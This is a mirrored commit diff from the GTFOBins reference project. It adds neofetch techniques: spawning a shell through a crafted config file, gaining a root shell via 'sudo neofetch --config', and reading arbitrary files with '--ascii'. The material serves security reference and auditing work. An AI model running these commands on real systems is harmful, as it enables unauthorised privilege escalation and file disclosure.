mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 13:59:17 +01:00
Add neofetch shell
Co-authored-by: Andrea Cardaci <cyrus.and@gmail.com>
This commit is contained in:
parent
4db207dac9
commit
720cc73c7e
@ -1,12 +1,18 @@
|
||||
---
|
||||
description: The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files.
|
||||
functions:
|
||||
file-read:
|
||||
shell:
|
||||
- code: |
|
||||
TF=$(mktemp)
|
||||
echo 'exec /bin/sh' >$TF
|
||||
neofetch --config $TF
|
||||
file-read:
|
||||
- description: The file content is used as the logo while some other information is displayed on its right, thus it might not be suitable to read arbitray binary files.
|
||||
code: |
|
||||
LFILE=file_to_read
|
||||
neofetch --ascii $LFILE
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo neofetch --ascii $LFILE
|
||||
TF=$(mktemp)
|
||||
echo 'exec /bin/sh' >$TF
|
||||
sudo neofetch --config $TF
|
||||
---
|
||||
|
Loading…
Reference in New Issue
Block a user